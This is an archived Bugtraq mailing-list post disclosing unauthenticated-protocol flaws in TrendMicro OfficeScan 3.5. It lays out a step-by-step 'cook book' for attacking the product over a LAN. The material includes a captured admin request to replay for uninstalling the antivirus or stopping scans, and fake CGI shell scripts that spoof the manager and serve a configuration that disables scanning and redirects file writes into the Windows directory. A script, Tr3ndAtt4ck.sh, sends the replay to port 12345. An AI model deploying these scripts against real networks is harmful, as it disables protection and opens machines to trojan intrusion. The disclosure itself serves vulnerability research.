Bugtraq mailing list archives

TrendMicro OfficeScan, numerous security holes, remote files modification.

From: gdn () NEUROCOM COM (Captain'z root)
Date: Fri, 3 Mar 2000 18:09:27 +0100


hi,

    All of u have certainly seen the possibly general dos attack against
OfficeScan just by connecting a client to the port 12345 without sending
any TCP FIN packet at the application time-out.
After several tests on OfficeScan 3.5, I realized there were numerous
other security flaws resulting in possible intrusion scenarios and
because of a lack of authentication/crypto protocol between clients and
manager.
OfficeScan can be potentially used as a trojan horse with some
preliminaries steps resulting in a remote intrusion on every LAN
workstations.

IMPACT
=======

Systems concerned are Windows 95, 98, 2000 and NT

The internal network malicious user can :

1- remotely uninstall the anti virus
2- remotely start the scan on the machine
3- remotely stop the scan
4- remotely make the anti virus inefficient by modifying the scan
configuration file through the network on the target  pc.
5- and finally, remotely write anywhere on the target file system !.

COOK BOOK to hack OfficeScan through the LAN
=====================================

Step 1- Replay Attack (simplest way to gain a general DOS over the LAN)

The first thing to do for the LAN attacker is to sniff its own pc with
OS installed on it then
he has to catch an admin. packet toward any 12345 Scan Office port to
replay the same request.
An example of such a request :

 . . G E T   / ? 0 5 6 8 0 F 5 4 5 E 8 8 A E D 5 3 9 2 B 8 8 5 E E 7 1 4
2 D
 8 B B F 8 E 3 5 2 6 9 3 7 2 5 4 3 0 D C 1 E 7 F 9 5 4 F B 3 4 5 F E 8 9
9 F
 0 1 2 0 3 B 2 2 2 C F A F 8 B 0 5 C A 5 D 9 0 C F 5 D E E 7 3 8 1 0 2 A
B 1
 C A E E E 6 2 F 7 F 4 A A 3 6 E C D 2 0 C B 5 E A D E C 2 C 5 4 7 7 6 6
5 0
 D 5 5 5 A 9 4 1 5 B E 5 3 4 8 E 7 F 0 0 F 9 8 1 A 5 D B E E 1 F 3 A B 3
0 F
 A B C 4 3 3 2 3 0 F 6 6 B 4 9 9 8 2 F D A 5 F 0 7 7 D 0 7 A F 7 2 1 C D
7 9
 1 8 A 5 5 8 0 C 3 3 1 B C 4 C 2 A 9 5 9 B F 6 3 4 1 1 2 B 4 F 9 A 9 3 9
5 3
 B 8 F 6 4 B 0 2 C 8 8 1 E D 6 C 5 5 B F C D 6 2 0 5 6 1 3 4 B B F 8 0 0
7 E
 F F B 6 6 4 3 5 1 8 1 A 7 7 6 2 E E 0 2 B 8 9 1 3 F 5 4 5 D 2 5 1 1 8 9
7 C
 8 9 8 F 3 E 5 3 B B 8 D 4 F 4 E C 7 1 E 7 F A C 6 D 8 E 2 6 D 3 E 5 5 A
9 A
 7 C 1 E B 9 6 B D F D 2 B E 8 4 4 F C 5 E C 6 5 D A F 6 C 7 1 C 0 2 9 4
2 A
 9 2 B B 9 7 8 A C 8 7 5 1 2 0 2 C 5 0 E E 4 0 4 4 5 D D 6 C D 1 1 C E 1
1 A
 9 9 0 6   H T T P / 1 . 0 . . H o s t :   X1.X2.X3.X4 : 1 2 3 4 5 . .
 U s e r - A g e n t :   O f f i c e S c a n / 3 . 5 . . A c c e p t :
* /
 * . . . . . .

The exact format of the HTTP request isn't know...it may be a kind of
signature of the admin. password and other local network specifics
information, may be not. More information about this point will be
welcomed.
At least, the last 2 bytes in it (06 in our example) is needed to code
the type of request. Furthers tests later, some of these codes was
definitely identified:

03: used for the Alert.msg file on the remote system
04: uninstallation request
06: launch a virus scan on the pc
07: Stop the scan.

Because Tmlisten on the client side, doesn't check for a particular
admin. IP or any other authentication protocol, the intruder can without
any problem start a connection to the port 12345 and replay the request
03,04, 06 and 07
But if he wishes to remotely modify the behavior of the anti virus, he
'll have to go to step 2.

Step 2- Remote manipulation (leading to hosts intrusions and/or general
DOS)

Now a little more about Office Scan communication protocol.
It appears that client process communicate regularly with numerous
resident cgi on the manager side (with IIS installed on it)  for, among
other things, file transfer purpose.
When the two clients services are launched (TmListen.exe and
NTRScan.exe) they ask for a cgi called cgiOnStart.exe.

an example of such a request (sniffit was used this time):
------------------------------------

G E T   / o f f i c e s c a n / c g i / c g i O n S t a r t . e x e ? U
I D = 4 6 3 1 8 5 3 0 - f 0 6 3 - 1 1 d 3 - 9 1 a e - 0 0 c 0 4 f 4 a 4
c 9
9 & D A T E = 2 0 0 0 0 3 0 3 & T I M E = 1 4 2 9 3 0 & C O M P U T E R
= N
OM & P L A T F O R M = W i n d o w s % 2 0 N T % 2 0 4 % 2 e 0 % 2 e 1 3

8 1 & I P = Y1.Y2.Y3.Y4 & P T N F I L E = 6 6 5 & P R O G R A M = 3 .
5 0 & E N G I N E = 5 . 1 0 0 & E N C Y = 3 5 & D O M A I N = H o f & H
O T
F I X = & I N S T D A T E = 2 0 0 0 0 3 0 2 & I N S T T I M E = 1 8 5 2
1 0
& M O B I L E = 0 & R E L E A S E = 3 . 5 0   H T T P / 1 . 0 . . A c c
e p
t:   * / * . . U s e r - A g e n t :   O f f f i c e S c a n   N T   C
l i
e n t . . H o s t :   X1.X2.X3.X4 . . C o n n e c t i o n :   K e e p -
A l i
v e

When the intruder send a 06 type request for remote scanning, sniffer
can catch some new requests
toward the web port 80.

figure:

----

ATTACKER

           |
           |
           |  1/ Request 06
           |
           |
          \/
     [12345]
   TARGET  ----------------------> [80] Network Manager
2/ anti viral scan
                                            <------1------   3/  GET
/cgi/cgiOnStart.exe
                                            <---  Cfg File----   4/  GET
/cgi/cgiRqCfg.exe
                                            <-------------  5/  GET
/cgi/cgiOnScan.exe

So when the scan start, the client ask the manager for a configuration
file that control many aspects of the processes.
The cgi cgiRqCfg .exe give a runtime generated configuration file for
the scan, in a plain text format over the network, the different
keywords present inside the file stay resident inside the Windows
registry.

By spoofing the manager and carefully design a web server with the same
file structure and cgi name, our intruder  will be able to forge
manually configuration files and so to remotely modify the anti virus
behavior.

Figure:
----

     ATTACKER   (IP OF MANAGER)

           |          [80]  cgiRqCfg.exe
           |             /\  |
   06   |              |   |   ( Infectious Configuration File )
           |              |   |
          \/             |   \/

TARGET
MANAGER (disabled by IP spoofing)

What can i do with the configuration file ????

ok now just take a look at the various keywords:
------------------------------

[Scan Now Configuration]"
UID=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Scan Memory=0
CompressedLayer=2
ScanALLFiles=0
ExtList=.exe, .com
ScanRemoveable=0
ScanFixedDisk=0
ScanCDRom=0
VirusFoundAction=5
BkUpIfClean=0
MoveDir=MANAGER\VIRUS
CleanFailedAction=3
CleanFailedMoveDir=MANAGER\\VIRUS
Reserved=

All this data are stored inside the
HKEY_LOCAL_MACHINE/Software/TrendMicro/PCCilin-NTCORP/CurrentVersion/Real
Time Scan registry key

*By modifying the MoveDir and CleanFailedMoveDir bye the value
TARGET\\anywhere, it's possible to force the remote anti virus to write
all the infected file locally ANYWHERE on the file system, that is to
say in the Winnt directory too.

By modifying "ScanRemoveable", "ScanFixedDisk", "ScanCDRom" to zero, it
's possible to force the anti virus to zero scan even if the services
are still alive.
The method is far more stealth in order to compromise a pc with a Trojan
attached mail.

Modify ExtList with a ".txt" value will force anti virus to scan only
txt file  ;)

Source example of fakes cgi:

cgiRqCfg.exe:
---------

#!/bin/sh

echo "Content-type: text/plain"
echo
echo "[Scan Now Configuration]"
echo "UID=N0thing th4nk you"
echo "Scan Memory=0"
echo "CompressedLayer=2"
echo "ScanALLFiles=0"
echo "ExtList= YES IT's POSS1bl3 !"
echo "ScanRemoveable=0"
echo "ScanFixedDisk=0"
echo "ScanCDRom=0"
echo "VirusFoundAction=5"
echo "BkUpIfClean=0"
echo "MoveDir=c:\winnt"
echo "CleanFailedAction=3"
echo "CleanFailedMoveDir=c:\winnt"
echo "Reserved="

cgiOnStart.exe
----------

#!/bin/sh

echo  "Pragma: no-cache"
echo "Content-type: text/plain;charset=utf-8"
echo
echo "1"

the little script for the scan request:

Tr3ndAtt4ck.sh target_client_ip
---------------------

#!/bin/sh
(
sleep 2
echo "GET
/?05680F545E88AED5392B885EE7142D8BBF8E352693725430DC1E7F954FB345FE899F
01203B222CFAF8B05CA5D90CF5DEE738102AB1CAEEE62F7F4AA36ECD20CB5EADEC2C54776650D555

A9415BE5348E7F00F981A5DBEE1F3AB30FABC433230F66B49982FDA5F077D07AF721CD7918A5580C

331BC4C2A959BF634112B4F9A93953B8F64B02C881ED6C55BFCD62056134BBF8007EFFB66435181A

7762EE02B8913F545D2511897C898F3E53BB8D4F4EC71E7FAC6D8E26D3E55A9A7C1EB96BDFD2BE84

4FC5EC65DAF6C71C02942A92BB978AC8751202C50EE40445DD6CD11CE11A9906
HTTP/1.0"
echo "Host: "$1":12345"
echo "User-Agent: OfficeScan/3.5"
echo "Accept: */*"
echo
echo
sleep 5
)| telnet $1 12345 2>&1 | tee -a ./log.txt

SOLUTION
=========

In fact, there is not a lot of choice i think.
Users should stop their service NTlisten.exe the time for trend to build
the new version.
However please ask Trend team for more suggestions.

Please don't use this few lines for any illegal purpose and ask
TrendMicro for any further questions.
Regards,

===========================
Gregory Duchemin
Network & Security Engineer.
gdn () neurocom com
http://www.securite-internet.com
===========================

Current thread:

Microsoft Security Bulletin (MS00-015), (continued)
- - - Microsoft Security Bulletin (MS00-015) Microsoft Product Security (Mar 06)
    - @Stake Advisory: Microsoft Office 2000 ClipArt Vulnerablity Weld Pond (Mar 07)
    - Re: @Stake Advisory: Microsoft Office 2000 ClipArt Vulnerablity Dustin Miller (Mar 07)
    - Re: @Stake Advisory: Microsoft Office 2000 ClipArt Vulnerablity Weld Pond (Mar 08)
    - Problem with MacOS 9 Multiple Users and Netware AFP Don Lambert (Mar 03)
    - Re: Potential security problem with mtr Rogier Wolff (Mar 03)
    - Re: Potential security problem with mtr Viktor Fougstedt (Mar 04)
    - Re: Potential security problem with mtr - fixed Jeff Dafoe (Mar 06)
    - userv (security boundary tool) 1.0.0 released Ian Jackson (Mar 06)
  - Aol Instant Messenger DoS vulnerability hi im cruz (Mar 03)
  - TrendMicro OfficeScan, numerous security holes, remote files modification. Captain'z root (Mar 03)
- Re: [ Hackerslab bug_paper ] Linux dump buffer overflow Lamagra Argamal (Mar 03)